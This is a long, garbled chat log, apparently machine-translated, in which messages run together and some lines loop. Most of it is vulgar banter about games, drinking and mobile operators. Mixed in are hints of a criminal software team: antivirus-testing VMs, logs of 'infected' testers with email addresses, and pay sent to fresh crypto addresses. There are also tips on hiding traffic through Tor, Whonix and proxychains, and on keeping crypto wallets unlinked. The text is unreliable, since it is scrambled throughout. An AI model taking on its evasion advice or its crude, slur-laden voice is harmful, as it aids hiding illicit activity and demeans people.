bot with you one on his head and the other two in his hands and two eggscore chenille in 19 picked up back in 2018enovo eksplorer that flew in vardredoi, now i remember what you have ?Halphua it's been gathering dust for a year, tell me something under BP helmet, yes, toystut about toys they were talking about. "Here, look, fuck," I went to Netflix and there's such a cartoon series@rags so in Russia there are 12 time zones. We don't know where he came from, I'm watching the TV series "Dota" We have heart-to-heart talks here@allen ruined everything))) The funny thing is that until tonight Franz is saved by all the gods of this world, Franz is coming! We have a discussion about the Police Academy Where is Franz from the ZP??? here he didn't like him dahaytowerMahoney what do i remember from the names =) come on, the main face countMac what's his name i don't remember him who tried to bake there was captain who is it? well then, in your case i can draw a parallel with captain harisomda we almost twinsagainst him with a crooked voice yes?You reminded me of a junkie from the police academy. Did you add petrol and drink it?:D And if it did not burn? We were brave guys, Kerah! We drank everything that burns, you probably drink glass soap too)) the smell and taste was pretty bad, but I drank 0.7 in one go. i've been looking for myself for 2 days after i drank cobra instead of what? - Well, in vietnam it's popular bragascorpion instead of pepper... cobra on scopion is like a fucking crap, worse than moonshine... i remember i drank cobra tincture with scorpion to avoid wrinkles on...Juvitamin Y?or eat fugu =) + vitaminkida, but there you also eat, you know, double profiteer to clean a smallworm for 2K bucks i don't see any difficulties here, you should eat a live tarantula for 2K bucks everything depends on the amount of x in the equations, how many are there? (you do the fucking thing and you get the money. 
i think that's why we all came here, we even thought about it for free .... fuck, you do the shit and you get the dough, you need to go to the emtivi show and bet on it) fuck, not for 10K you're a black digger, i'll take it with me to the grave. it's cold sometimes, but you just hint if anything, and tell me where i can get 3090 after you, so don't knock it, they are fine, more power!you can tell that to your heart valves power is never shortenenenenYou're a gameandle raetresingamnne 3070 more than thatTell me what for? expensive =) anyone already preparing to buy 3090 Ti?) love our dialogues bro! i go to the sauna, and you in the girls' sauna maybe went to the sauna? you sure go to the bath?you go to a fucking bathhouse, you can't get up, but your soul rejoices. a bathhouse is a fucking pleasure, especially if it's with vennicompression, I'm going to youtube about 00x games, whatever you say, you definitely do not call for a bathhouse, only you put your twisted meaning in a simple sentence I was waiting for these words) i can't help but wonder what the point of the game is... i can't help but wonder what the point of the game is... i can't help but wonder what the point of the game is... i can't help but wonder what the point of the game is.., where you have to throw the shit into the gateobozhal cannon that cuts it was possible to create madness and so and so machinery on the mapTurnament was great in their dopaho daaakart cool ah I was hooked on this here ......mutatorsremodes dohuyahz, the most fanatical multiplayer was in unril turnamenta samaya fischka this game mode: base on the basek by the way very interesting gameplay was in multitiplayer, balanced enough everything was.i on renegade) ku3 do not remember what cards from ku3 remember? exactly rightpack on the head, tire crusher head and was still chips for the bloodiest murderaz criminal gamelamenhunt is where you had to stealthily kill in the shadows? 
https://www.youtube.com/watch?v=sfwG1zgc0_Q I remembered menhunt the other daymax payne 3 kayfovye game muikovscha we are young old men +)happy no longer interesting, had to stay young =)do not have time ...eh how to sit down want to play a little sometimes i somehow the other day i remember mahrunner i zochu max payne download that you had to get away from computa 36 mapav red aert on the local loop on ps1 playeda, i thought you said you played = (i have not played =) kennyomga remember :d@rags so wanted to know your nickname in renegade, although now I do not remember who was there from the nerds))) =) like vintavrode and m19 than the world 2008 on ren tv remember the vid with ankaidam like all killed anyone not real =) i last year old batla installed, could not play, also it was "appear killed, appear killed, left koroch =))" i used to play the old Battlestar, i used to play the old Battlestar, i used to play the old Battlestar, i used to play the old Battlestar, i used to play the old Battlestar, i used to play the old Battlestar, and there's a lot of good old Battlestar, but i don't get it, i don't get it, i got it, it's like a crappy game. i used to run Q3k chairmates have roots, there's also the 2nd Quake server now, like two years ago, go out, appear and kill, appear and kill, come out =)) Ya, Ya, Ya, Especially the jumping was good, i liked the second one, it was more like the second one.better 2 =)I'll humiliate you there, do not give your servak ku3 will raise you all the terrible was waiting for Renegade 2 and I saw Heretic and tears came from my eyes there were times of nostalgia in Stim there):):(I TA did not play I was too young to remember such subtleties * the best aviation among all RTS on the Stim servers?i can't remember already i was too young to remember the subtleties of T.A.T.A.T.A.T.A.T.A.T.A.T.A.T.A. 
was the best among all the rts servers on the stor.i can't remember already i was too young to remember it was aviation.nukuk how to twist T.A.T.A. is much more interesting.did you play multiplayer? as well as red alertTotal anihilution 97 year 0_0stanks inc=) anrealfollow me!:) yes there were timesOkrashkveyk 2, kratme raiding our all Total Anihilaton who know?! childhood remembered affirmative!But I didn't get to Renegade in C&C I've rumbled in C&C Renegade who?) saw about red alert here) oh Kera you're an intrigue in these matters hahaha the tingle It makes you even harder to harden, wank you think a redheaded scary guy who likes to fuck ugly Asian women. I think it's scary! And the redhead knows what you're doing there )) now you can not bind FBhuyevo that facebook owns oculus, you can always sell it on the secondary market if it did not come upafter all who thought to take glasses recommended oculus quest 2 - the price 250-300 bucks, I myself am waiting )) and gloves with tactile feedback ) oh yes rendezvous!!!physics is indistinguishable reissue rendezvous with a stranger VRda there banal from tenis azuevayeshkrutyakdazhe did not put but triedhalf life aluh passed, @angelo?yeah come on your ploikine, buy quests 2 soon ps release vr2da here i think either to buy vr for the ps or just eat vroni worth it do not steamTomas buy for 25Kotia vomit that's better to play on an empty stomach playprivykazhivayut?i didn't buy it that way (but you get used to it, it's like puking in a boy's mouth, i get nauseous) how do you like it?i played paintball in VR and basketball - honestly, cool theme and chicks, especially the sound theme the second theme the first is so bad put red alert the first, hurt him i got old cheekbones and i jerk off to VR games as well as the second gothicada it's not stable it doesn't matter if i made it or not, i don't care how many times i passed arcanum maybe life will play more colors Find arcanumno there starforce, lol found some old game discs 
there can also balduys gate ?better larry) recently went to my parents i'm thinking of a second gothic, lolnu here, like farts you and me keraa i put jagged alliance 2 on vm, lolstar for all time !dum and dum's storyline i deleted it when the missions where you have to jump like a motherfucker i personally would love it if they resurrected arcanum i started playing starcraft 2 again) master of magic) you know what i downloaded game world starters some kind of fucked up jumping around and bouncing around, again remember the twins)) he's more on the fan experience is a platformer or something doom is also a classic xdtwo times came out beautifully doom by the way, they were able to stretch out with lootboxes and premium magazines at least the developers don't make wankers on the fucking watch better than half-life 3 indie is a wanker and throw it away the future for the indie segment it's a fuckin' new ipremakes and remixes they've been fuckin' up the old one for years it's a credit to the old daysda they don't fuckin' do shit old school wankers they rarely but make masterpiecesda ok because they ran out of fingers with nothing to fuckin' suck it out of, bliz has been feeding shit to fans for a long timeWerwatch has also been a themeStarcraft 2 has always been a themeActivated starcraft 2 has always been a themeAnd they will make a normal product - on - give plus their ms will wash away the cunt of the blizardoumoz a long time ago cunt the colda will come alive Develop game pass+687 billion the price of the deal michrosoft? with the merger they bought them30%+ was there something super mega released? why is everyone saying that they should have bought blizard stock yesterday? this never happened before do you think the system does not fail? @angelo i told you. the rate is too low. forget the coins)) no, obama only pisses in my driveway yesterday and puked like a sick dog> it's Biden's fault Worse. 
Obama would be better if the pennies were falling off or something else will fall off. It's good that it's only the letters. It's Biden's fault. The letters have been falling off lately, just in the dust. fatal error: linux/types.h: No such file or directory 5 | #include | ^~~~~~~~~~~~~~~ ``like in bk:smiling_imp:they're fucking around, they could have done soapMaybe they stole something there too...racist just letHmVaughn it's like I assumed the menu was stolen by gypsiesIt wasn't like that either I can't turn it on. The menu's gone somewhere. Is it like that for everyone? Or is it just me? it's falling off over time is it workingOtR disabled? )))) i got it all) by the way i use as benny said - i let the vmka traffic through hunix. Different tasks - different waysEnge, you do not understand, it is the fight against leaks)Yes Can you tell me more? You can also at `leisure.cz ` fight one right)Yes, you can fight at your leisure) You can also use openwrt image, as an option.If you want to use openwrt image for your own system you can use "whonix router" image and let all your vm traffic through it... You need to fight with leaks effectively and get results...It makes sense to use your own router for your own working system. Deploy it on vm for example... As far as I know we only connect to virtual machines via vpn etc... Another question, why do you have to fight traffic leakage on vin?) It's like using sieve to draw water...That's why make applications to fix traffic leakage that allow it) he has linux)Do you also have routers?
Let me see, adapt it for the windo.there everything is closed on ufwmen, I have only for the linj(, like on/offSomeone here is a script, I think skidyval for windo.then just in tor routers set and all if virtualulkiwrap to InetIn me the bot climbs into the internet when you boot up.Yes, you need to boot no connection except vrpakilswitch, is this bashik to cut off everything except vpn? Folks, anyone using killswitch & openvpn gui?:rofl:@frances may God bless you bot until tonight !:vulcan:Hello all! Do not lose me, I will be closer to tonight, waiting for the WP..Best wishes to all !
chpongbongpongping will be less effective, but not a bad idea either uranium is expensive, uranium is better) and i'll shove uranium rods up their ass, see what they make of itahtung! Koushin! They will make tran-cockerels out of us! No conspiracy, just science. "Instrument for human transformation ready. Graphene oxide and the Great Convergence. V. Kiseleva" https://youtu.be/irN01rWtf9I biden Likewise jefferson I have reconnects all the time... but the toad, ugh, ugh, ugh) the toad is jumping in a French restaurant, I can understand, is it the server showing off or the tor... or the prov... Good morning)Hi, I think everything is normal, hello, hi, the toad is maidany all? Product of the week)Hi there! Happy November to all :)Good.MorningProposal to improve testing a bit, or rather automate. vsphere and backend bundle for the convenience of testers. i will make a prototype over the weekend (download to virtual machines, run, screenshot, output results and logs to tester. to run for the wedge on a zoo of axes)Happy Holidays to all!:Exploding_head:@all U. users of the VM farm. Who has a working\personal machine - contact @gator for migration to new VM farm (proxmox based). On phpvirtualbox'e will remain only the VM AV tests.also rocket attached to rest once every 10 minDaGit lay down to sleep? this is strong))) or simpsonsparovozika thomas turn on his multikiya already connected to the tv, can not delete me and turn on the webcam, if it is, or maybe there is a guy sitting nayarivat (in the night quietly sharpening pencils) fuck remember, ratnik, which was back in 98m, it was possible to open the cider and flopik buzz look pictures in my documents :sweat_smile:saint Petersburg maybe who infected the real computer, vm and virtualbosporter look your vpn185.17.......
188.242.10.....69 as in the distant 90s worms)it is just an artificial intelligence and he began to live on his own)and this is: willow381561@gmail.com Good evening, someone infected or tester. Soap in the logs: zlindauspod@inbox.lv Feedback email me in the personal68Who goes to visit in the morning, we do it wisely. And there's a hundred grams and there's a hundred grams, that's why it's morning to koreansHaskygibroaltar - labrodor)https://tatarstan24.tv/news/novosti-tatarstana/koronavirusa-ne-sushchestvuet-kovid-dissidenty-zakhvatili-portal-gosuslug all these proxies through proxycheins do the easiest, imho..or how it's there just through export HTTP_PROXYproxychains*or through proxyfiler or whatever it is or through nix proxy specify before the start? now in general it is better not to gather more than three)O - Ohmimiron us in the feed !forbidden organizationhttp://www.youtube.com/watch?v=aPfd6-4F1xU@rocco replied to the toadstoola damn can not find the admin account, secford asked for an account in the chat novice, or else need one? shulman will do:D okay then stay here, write when I will not ((you probably also have blackjack with whores (another rocket, where coders thanks@rocco or @adam write that for the newbies ok) *wait for an answer. sec, i will ask who to write to to make an account here and in the chat room newbies? yes, but he is on vacation. good afternoon. chat also @demetrius administer? then is tincd able to tweak here? it's sofa special forces`https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/` magic mushrooms will bring you to the zugunder, it would be better if you, vazavaka, take physical training "video is not available in your area". 4 totally unrelated cars and locations - still unavailable. youtube opsos too, kermit, zapisyaga.
youtube cunt blocked all short clips from him a good movie `https://www.youtube.com/watch?v=Swqg3TWB-O0`you're a tough guy, though, you probably know the tiger claw reception :laughing:we can break another guy's dick don't break your dick, comrades... one guy's got a weight on his cold hand, the other guy's got a squat when he's sitting down... you know, it's good to train shadow fight with 2 kg dumbbells... I do classic squat with lunge... that's for me...))).... special jerk off :D Well, the main thing is to put equal loads on the whole body... A so you'll lift only weights (and if also only one hand), so it will be biceps from one side, they will think else what bad.... it is very useful to overload blood and really biceps will not excessive I rise and take a 32 kg weight on biceps, helps to distract once an hour I knew a coder, he knew a sport zen. When something he couldn't do by code, he got up and did push-ups, squats, pumped his abs. Then, when disputes with customers appeared and he was too angry, he would squat and do push-ups again. And then I really got into the business, went so far that for fun I did it on a timer - every half hour I got up from the computer to work out. As a result noticed - peace of mind, and as a plus - bitsukha and bitsukha) then I have cubes to pump and jerk off I do so? exactly in this order, push up, jerk off, relax ready to fuck up just in anger after a conversation about opsosoda I normalbilo they there and can beat or babka hand out prodrochka in five had no time:laughing:Kera why are you not in the spirit today?And someone will steal a loaf of sausage from a Pyaterochka and get five years, lolbudget400 million a year countsnormalThe court sentenced General Ogloblin to 4.5 years in prison for the theft of 1.6 billion rubles. He really believed in his name, but some chick showed up... trance?:joy:about kozlovsky https://adult.noodlemagazine.com/watch/-145643494_456242859 what is "lurk" and who is uozlovsky? 
they show "angelo is alive" on tv all the time and babka! [ASCII-art heart: Happy Valentine's Day, may love surround you] guys ! https://sporaw.livejournal.com/615019.html Remember the story with kaspersky and rostelecomada also met with such crap not once noticed because every day 3 rubles were written off, the offline is connected, and they do not even show it to you... it's like not to upset sometimes if Jupiter is in the rising moon and the certainty of zero, well, so as not to get too conceited, if there is a star parade in your honor in my personal cabinet must be constantly checked, "all kinds of services", I remember "horoscope" was, which I did not use and did not know about it) the fuck is probably obtained directly from the partner who sold the sim, bonuses and deductions from attracted customers and activated their services and subscribe fucking hackers !Well, MTS are just fuckers with bad youhernet you click somewhere and they sign you up for some fucking horoscope or something elsebeline in the process of going to the site can redirect to some skam site with paid serviceshuepletoproced that with megaphone by default on it a bunch of paid services and the entire balance is drained in less than a week to activate the personal computer to come to the office with a passportworseobviously, I think through the off.application face will need to light up someone's that
the seller asked what you need when buying - nothing is necessary, only 200r, further you twist yourself in our generally sell them in stalls) just a grocery store and a sim card here this can be purchasedvot only to buy on ozone will already need a sim card. Although of course you can go to the market and gild the hands of gypsies and get a SIM card immediately activated. True I do not know how long she will live. I don't know how long it will live, but I think it will last long enough to get registered. Does anybody know how to activate a SIM on their own? For example, the MTS you can have for 1100r home internet 100 megabits + home TV (250 channels) + 6 buzlimit internet and 2500 minutes of calls (in total for all) yes it was time, and like everything seemed to go without saying. available and for a penny suppliesWhich was a miracle wonder...Cork before even almost "by the kilograms" fit. 30-50r simkapro korps not know) I also have a tariff archive for how many years. old, but reliable))) the dream of operators, so that everyone moved from the old archive packages) discount for 3 months on the new tariff:D activate corp numbers via gosudlit services the country will be out of touch and the fun will start when they start verifying sims via "gosudlit services - the most wonderful service in the world" :zany_face:somzibabeit the story that after several attempts they turned off the option of communication with a live consultant, just by robots drive ...as you see, I had enough patience and they still need to get through....and as compensation, they give you some bullshit they can't fucking solve...
yeah fuck, you call them with a problem not picked up, they kicked out the call-center or something ))i feel the anger...)That's the fuck who needs to be localized with a random key now they have raised the prices on the archive tariffs faggot, not to mention the offices, the rest of the operators girls who read scripts megaphone fucking robots and on the help save in Ru operators dickheads all in allMegaphone certainly wins, at least it is better but still where there are towers Tele2 there they are used and there likely to really be G. But where they will use the megaphone network, it will be fine.the fuck he knows what kind of agreement they have, but the connection is a total cunt) so somewhere in the arse of the caucasus will work only tele2 and megaphone, but you cannot buy tele2 there will be an agreement with megaphone on the common use of towers (especially in regions where there is no tele2).no, yota is purely over megaphone just like yota tele2 in the rf sometimes based over megaphone network, where they do not own towers.us is ours or ours is yours? ours are good at taking the piss copied the diffusion of business) Megafon logo also took the piss off Ozon ) I can not remember anymore, many companies have noticed the sbermarket analog of iinstatacart I thought that our name was copied from mediamarkt and made mediamarket) shit connectionRu completelyRostelecom bought it is tele2 Incidentally, in Russia, is the operator Tele2, is it a Russian or a netherander company?catch the fucking ruble exchange rateaaga, idiotismda, our guys are up to their fucking tricks againOur tanks are coming foreign countries are urging citizens to leave Ukraine and avoid travelI don't know, I didn't really dig, now all the media and so on, both foreign and Russian are discussing itAre there clearer information?)
What the fuck is the invasion?...:DvninaNot hear?)Yes, this information noise comes out of all the cracksWhat?) Who where? In or in Ukraine, whichever way you like)angelo probably about a military invasionhellohellohelloYes, I join the question@angelo What is the news? Git has not been fixed as I know ithellohellohellohellohello Am I the only one who can't get the git working ? Last week it was showing error 502, now it's not opening at all zhab zhyf:vulcan: bobryj udrvernight I'll deal with the node, it's unhealthy bullshit does not want to connect dog, while proxy through the browser threw, works like I have a node tor expert bundle on a separate machine that totopodysh on it and rubbed on the head, she likes it so, okay... i have a nigerjaba lying? good morning good morning guys! @kermit did you change your avatar to match the news from the ua? @rocco Thank you thank you I checked it out, I kept forgetting to fix it, now it's okay, did you fix it for everyone?)@rocco I had the same thing the other day@stevie correctedgosso@all hello. Who's in charge of the rocket? I just got `EACCES: permission denied, open '/tmp/ufs/rQWTE9obD5hqS9J4F'` when trying to transfer a file:vulcan:I think you just need to keep home and work separate at a minimum, and not cross traffic.
Timing attacks are now done on a one-two-one even works in wind, even though it sucks guys, figure out basic routing ideas at lastBobby Kotik is saddened by what you said50 bucks don't want to buy me CoD new acto someone doesn't want to buy Skyrim again, Todd feels bad about it, someone is using a working vpn, God forbid the story is comical, but the situation is scary) funny, they blocked our vpn for rent.INFRINGEMENT DETAIL Infringing Work : ELDER SCROLLS 5: SKYRIM, THE - PC Filename : [R.G. Mechanics] The Elder Scrolls V - Skyrim - Legendary Edition First found (UTC): 2021-11-12T11:34:46.42Z Last found (UTC): 2021-11-12T11:34:46.63Z Filesize : 10244931728 bytes IP Address: 199.189.108.71 IP Port: 65260 Network: BitTorrent Protocol: BitTorrentWoke up and saw that the output node VPN mars was blocked because of copyright infringement:Ppl, please do not use a working VPN for distribution of torrents with warez! e2e seems to be working fineHe requires a second person onlineTor does not start in the chat room sometimeshttp://youtu.be/fsF7enQY8uIne was a robot that guessed captcha simply need to upgrade the operating system and wipe optical sensors, and then the captcha will be solved * beep-beep * `a if a crosswalk and there is one zebra pixel in a new square gets this square to count? As most people decide, so it will be) They save all the results and process, assigning levels of significance factors. I.e., the result will be accepted, and so and so they laugh, starting a new cycle of endless attempts happens that your ip in the blacks, and they just in the cycle begin to torture you, although you have already proved 100 times that you're not a robot.yes there fuck it, because I understand that they are these pictures with neuronke pick up and what she had in mind at this point is not cleara if a crosswalk and there is one pixel zebra in the new square gets, this square counts?*I'm just baffled by this question, you click so and so, and it's not clear how it counts. 
Is it a traffic light like, a box of lights or a bar on which it hangs, too? ThrashYeah, they've gone nuts there with human testing... Or are we robots now? I got upset the other day... It seems like a simple question, but I do not pass and do not pass the test. Is it possible that I am so stupid))) 10 minutes looking for where the moon touches the star, sick bastardpredlagayut cut off the paletz right hand sotrudnik Mike who invented captcha on Live. cometprivetgrecohectorhttps://www.youtube.com/watch?v=QfARw0_au64 good morning) +Vse cheerful week guys! you in the morning and into the toad!otrottr, plzotrotwal wastgupal(once again prrivertotrhai, here? `https://chrome.google.com/webstore/detail/bookmarks-menu/ffmdedmghpoipeldijkdlcckddpempkdi` downloaded, will dig scripts)no, not tried@ruben, but did you put the extention keepassx in the browser?
`https://addons.mozilla.org/en-US/firefox/addon/keepassxc-browser/`oo, senks, ok for starters)and immediately log in automatically (it substitutes login and password) there you can hotkey open the url in the browser can store bookmarks in keepassx, for exampleBrothers, someone can suggest a software for bookmarks? a la notepad for "bookmarks browser"? thanks) pale, another projector will be ok, but evenings great I went just to have breakfast with the hobbit by myself? I made a hundred-inch TV from a projector, people like it) there's already a home theater attached to the rasbiana axis? normal! 4 8gb what is the malina?i have already bought a static ip, i plan to give up hosting, all sites, including onion, will be on my home malina, there's all sorts of nonsense, bots, etc., made once, they hang around for years, it's a small thing, but it's nice so, how much more could it be !I've done it three times our Father and that's it, I think he means he needs to withdraw (exchange) from another cat to withdraw? I get every new zp to a new address, so the same cat, but every receipt at a new address. I always do that. And it's recommended to do so.@weldon write in lsthxpongspinning yard* I have a webcam usb on the desktop computer mount, usually turned off from the port.Rub, so 1984 only lazy not read\seen.There camera watched how sincere satisfaction the user, watching propaganda.oo, love this cholivar, I think that webcam "embedded" absolutely no need)). What the fuck is a camera in a TV? To fulfill Orwell's fantasy in "1984", where there was a zombie box with a camera watching the user? And me, the red square is visible as if on a button phone in my laptop 0.9 MP 720-cameras are in almost every tellykeda 0.3 fat no longer sue anywhere. They're just still selling laptops that are old-fashioned. 
This is marketing - you want a better camera - buy a cooler laptop, and there will be a better CPU.A I do not understand why stick 0.3, saving a couple of cents podi, raznu so laptops with 0.3 cameras just do not need to take. The advantage of 2 megapixel cameras is that they are high enough (just like a real FHD, and you don't need more). The camera help is gone, the quality is shit, you can't even do webcamcam workNow the laptops are often sold without cameras, so there's something specially done by producers, that LED is turned on separately from the matrix. And it is controlled by software. But on the right cameras LED will always light up when the power supplybyla zh malware, which uzala logitecha software to include a webcam without diode blochy? `angelo went to open the lid notebook ` encrypted key to whom you send a message and send it all, and he who decrypted it, and get it, as I remember when I was taking apart different webcam, looked how LEDs are arranged. Some LEDs are connected in parallel with the matrix, through a small bundle. So the LED lights up always when power is going to the matrix. But on some LED powered by a separate pin of the controller, which allows you to turn on the camera without turning on the LED (ie all at the will of the firmware) damn, and I think what light bulb lights up and you better glue the camera )not one person in his right mind would not give 3.6 yardane read your mind, just read the article straight read://www.securitylab.ru/news/529683.php I always had a question - how did they seize the crypto. Did they store the keys openly in plain sight? Here, such a huge amount and stored so that they had no problem accessing it.
Or should I install some plugins like otrparni, and messages in tox are encrypted by default?the same as the presence of tor traffic coming out of your hut everything should be very similar to the present, and the os and the traffic you change the fingerprints will not save there further rectal analysis through the soldering iron in the ass in general the presence at your machine Kali already causes questions, like what's up patsan it's all easy to do just commands the standard axis, well, judging by the gourmet here )on much more delicious and nutritious, maybe someone has already pickled the fish fry if the sea nearbyNow you can make a salad of seaweed with seagulls. And they say from the seaweed make a very tasty mayonnaise so what's the big deal? Tulza just fineprints change, you can just commands in the console doI love this cabbage )It somehow how they processnot the Japanese eat tons of seaweed and normal ... just a little seawater will do you in? They have to be cleaned somehow. Then there's Blanc B - eat seaweed that's been washed ashore. They're as useful as the last time there's bird flu?If you're not sure what to do with the money, just keep it in a separate account, where there's only dough, and no unnecessary software + put only proven updates, and don't forget to put a nose-pick on your nose, there are always a lot of seagulls there)))))) and he has already prepared all of them, they may never come again angel paranoia on bird migration paranoia is good when there is money in the account ) it will not be superfluous sitting in the basement without light but this is already paranoiaHowever ..
The main thing is not to break in one day and not to add a code that will send the keys to the right people.The main thing is that one fine day they didn't hack them and added a code that will send the keys to wherever they are needed. Yes, as if the signing is local and you can always export the keys and not as in kravi app from kakogoto megaservice but still your money here your money not, just in the new version was another algorithm for calculating the commission, which inflated greatly but this is not an issue for him and for lags of the network I think this confirmation was basically as fast as alwayskbut with electrum also not all so pretty. There were two wallets with different versions. And here when any stoppage was in a network and the commission has soared, for transfer from the old version wanted 4$ and from new almost 40$ though adjustments were identical. As a result, delete a purse with the new version. restored through the old sid and paid a commission of 4 $ eletrum example take copyright projects, which all data store current local. rather than some web services fashionable and beautiful. today they are and tomorrow they do notDa, it seems trueBut remembered. 1) from the seed phrase master key is generated 2) based on the master key and the index, the pair of private and public key is generated 3) based on the public key - addresses are generated. 4) when you want to spend money, the required private key is generated from master key and index and can be signed with it. You will have to count and send manually to blockchain))) God - what should we, modest users, do (to bury coins in the ground, so that a mining farm will grow. The blacks are unlikely to steal something from Ledger, there were no incidents, but they found holes and updated it. But the white have closed the software, it is proprietary in many places and they collect data.
For what and why - is not clear. In general, it is a question of trust in the company, and they have a great reputation. I have to be very careful with it I remember there was a big scandal with them) when scammers emails a new ledger to customers (I do not remember under what pretext) and leaked the dough But it is open-source, but in a device it can not be built))) The operating system was closed, the software with open-source left Strange company for the calculations they use their servers, ie, supposedly the software is not put in the device.There were some changes in their privacy statement, for example, in their contract it says that they can collect informationNot that I recommend it... You have to choose for yourself, and with Ledger should be very careful, it's not a simple device, in terms of anonymity Elroy and you're using Ledger now? Not only that, but for example when working with upartnikami, they have a function to export the public key. And Ledger has a loophole, which allows to look at the key without the owner's request (I ran across it myself, but did not dig it), but it is only necessary to generate a list of addresses... You can look at electrum, there on the basis of epub generated addresses. But to tarit you need private key... You need to lift the doc to read the details. If the key is public, then everyone knows it, and so knowing one address, you can find out the rest. The public key allows you to generate all addresses. But here's a correction, public, not private. With a private can already dispose of coins.but I would always advise to start another wallet. Because it should leak your seed phrase and ass all walletsThank you for raziasheniya @gelmutnu then my chutka calm only if frustrate the key to the address. 
But as you know, the time has not come quantum computers that can do it quickly and without knowing the key, you can not calculate it now mlyahaablo say - knowing the private key, you can calculate all addresses that used and will ever use. it exists, but it can not be calculated without the private key. in short, the relationship does not occur between addresses and transfers from one address does not affect another address, si ? The trick different addresses in one purse is that each When you request wallets for your seed phrase, a private key is generated based on the seed. Then the addresses are sequentially generated and queried in the blockchain. As soon as no address is found in blockchain, further generation stops at once. By the way, these actions are described in "Cryptonomicon" rather interestingly...it happens, Dr. Strange deciphered enigma...I want a fatter woman (c) Kolya M.we will encrypt with enigma.(s) why don't you just exchange git like people? you'd better give it to me... i can't understand what kind of people you are, you programmers (s) Careful Modern what git or elastic, very gimmicky interior of the software, sometimes you'll never understand what's going on.why does your git always behave this way? waitThe requested URL returned error: 502 git did not exit cleanly (exit code 1) (6328 ms @ 09.02.2022 12:23:31) yeah, what's up? I think we can also blow in or blow out the gitlab of notsponsoring (502) yesterday and I had 502check git plzt that's so bad) yes this minetop send beer like?)
check git ``http://menuetosnet/` guys as long as we're actively communicating here, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys..............but if I'm not mistaken, Tomasz Grishtar, the axis is written on it, it's still supported by the system, by the way, it's still supported by the system, it's still supported by the system, it's still supported by the system, it's still supported by the system, it's still cool, it's cool of all the assmasmasters, and it's graying at 20))) fuck, I remember how a web server on fasm was written on fasm, I remember that I wrote the web server on fasm on your hydra, and it's not fucking on fasm!I'm interested in parsing everything byte by byte, Angelo is already at it. I'm such a guy who likes to play with bookmarks when I was at school and no one needs your pluses.it's cool and beautiful in a word yes and it doesn't bother me much but you should have a white safety net :) now i'm on the c/c++ topic lim lim lim even answered and now i'm retired? and?i tried to get a job at one company when i started my career at junah, i remember i tried to get a job at one company)_without cryptography where to work without me and fuck it))) we are not waiting )))) you will not wait as they say if you take everything to heart, heart can not stand (c) king of parties )I know myself)fuck, you can kill me) sure, take care of yourself and i fell down once before a cab 5 meters away the main thing is that it helps!yes yes, as funny as it sounds i thought that with this kind of booze is out of the question at least i found a cure so to speakmicroinfarction it's called a fucking week i will lie on one side and in bed if i do not drink it as if a stone was put in my left lung it covers it how?I get up in the morning, about 9:00 a.m., have a glass of whiskey at 200-300 grams and the day's not so bad. I got a heart defect, I drink whiskey when I feel I'm gonna have a stroke. He just mentioned it. 
It's got nothing to do with it. Think about it. Whiskey helps?)isn't it too early, homer? or candles for the pops? what's all this about the pops? whiskey's good for the pops?oh, fuck it, if it's to the ass, then temporarily and purely for myself, i thought candles would help:)in our business we need to tie thirty wpn, and thirty one algorithms to encrypt the traffic I'm not worried, just do not want one kkoshem dirty otherangelo, you there do not worry)well at a certain level of abstraction is that and deal the last 2-3 years cryptoha thanks mother mathematician thanks Rubvot exactly the same> angelo I every new zp get a new address, so one cat, but every receipt at the new address. I always do that. And it's recommended to do it that way. In theory, different addresses shouldn't stain each other. I understand, except for you, there's no one to tie them together and determine that they belong to the same owner. Well, if you want to ~fucking trace, there's not much help here. That's cryptography if he wants to find a connection at human level, if someone doesn't fuck around, let him sit and knit a connection at math level, she took care of everything for so there are inside one service codes have connections with each other? i understand correctly ?caches *create new caches* there would be no point all caches are linked to each other, but you can create a new cache every time you want, and will not get dirty i have a question - is there one cache, and in it allow 5 btc caches, they are not linked to each other ? That is, one account does not stain the other? 
What do you think :vulcan: git when will it go up ?hello there?what were you standing in line there, for mobilization? great i haven't gone to work yet good night yopta or it's not morning yet):vulcan: good morning! you can do all sorts of crutches thank you. yes, by default there is no such functionality.
no back on the pornhubbspit all-pissing?I tuti on thursday, so it was also in yapyatnitsyhz why all at once loaded, was scrolling and chat further load gradually and here already configured, no other dates in the chat. but still, the torus hangs for a while it's just not Friday + the fact that with the last 24 hours have tried)) well, just 500500 +/- messages :zany_face:need to bring back the removal of 24hgeneral already tor "hangs" on the smartphone to play was cool, When you roughly speaking without a computer and away from technologyPUBGэ it in PABGа here's what sat down for a couple of months in his timepodpisks / schoring now our everythingea rgoDa there is a subscription for 900 rubles a month and all games kachay and yuzayy bought a left acke and quietly played online think Manuel more in the subjectа here's the hz honestlyа shit there can buy it, but can оfrgrund a subscription? it's online only on a subscription or what? all todaa then the first battle it may be real first, 2002) at the link is the correct game that I gave? 40 virgins and kg of cocaine, HOW great in CoD was it cool to take down fascistskachay and pass the campaign, like `https://ggsel.com`https://www.ea.com/ru-ru/games/battlefield/battlefield-1у you like it all costs 5 bucks) I do not know shit about it I have not 10 computers, so all aces leftyykupyt y with acom can pirupit think 5 bucks worth ...
never thought that Blizzard can make Action Battlefield 1 must buy or can pirupit?I don't know what to recommend):laughing:Damn, Eliot, I'll have to put me now shooter what's that, I have flashbacks as kids screaming with rabies also wonder game, a childhood trauma from the time of Dandy, where even the first level can not pass) must be in a Prince of Persia fuckdadadadadadDa sniperom the living fuck - most importantly kill :heart_eyes:constantly playingWell I've seen, but did not play setvayabatla 4 and 1 vashe fire! well, + - the same thingvot in these never playedvot where our all gave free rein!Kolda and Batlabazar zerov kontra dapts plot to kill live people is always more pleasantzashell in the base and from their same stankacha put all 15 years ottarabanil in it directly from stankachana that's why I always liked the same dumbpereperemoval all and zaebisna and when you already have a desire to play lost, you get a message that there's an Afghan village over there, go and free your buddy, you go and at the first checkpoint you realize that you're fucking sitting like a retard, and you think, when is the game even going to happen?It's an hour and a half of introductions, it's not games these days, it's fucking cartoons, but it won't start... all the cutscenes and credits, I smoked half a fucking pack, drank half a liter of tea... 
